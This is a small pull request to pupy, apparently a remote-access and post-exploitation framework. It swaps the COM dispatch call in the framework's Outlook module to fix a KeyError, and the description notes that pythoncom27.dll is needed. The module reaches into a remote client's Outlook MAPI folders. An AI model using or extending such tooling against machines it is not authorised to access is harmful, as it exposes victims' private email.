### PR TITLE
Bug fix "CLSIDToClass.py[...]in GetClass KeyError"

### DIFF
--- a/pupy/modules/lib/windows/outlook.py
+++ b/pupy/modules/lib/windows/outlook.py
@@ -34,8 +34,8 @@ class outlook():
 	def __connect__(self):
 		'''
 		'''
-		#self.outlook = self.module.client.conn.modules['win32com.client'].Dispatch("Outlook.Application")
-		self.outlook = self.module.client.conn.modules['win32com.client.gencache'].EnsureDispatch("Outlook.Application")
+		self.outlook = self.module.client.conn.modules['win32com.client'].Dispatch("Outlook.Application")
+		#self.outlook = self.module.client.conn.modules['win32com.client.gencache'].EnsureDispatch("Outlook.Application")
 		self.mapi = self.outlook.GetNamespace("MAPI")
 		if self.folderId == None : self.setDefaultFolder(folderIndex=self.folderIndex)
 		else : self.setFolderFromId(folderId=self.folderId)


### PR DESCRIPTION
Bug fix when this win32com library (embedded in pupy) is used with outlook module.
pythoncom27.dll must be added to the project: outlook module needs this package.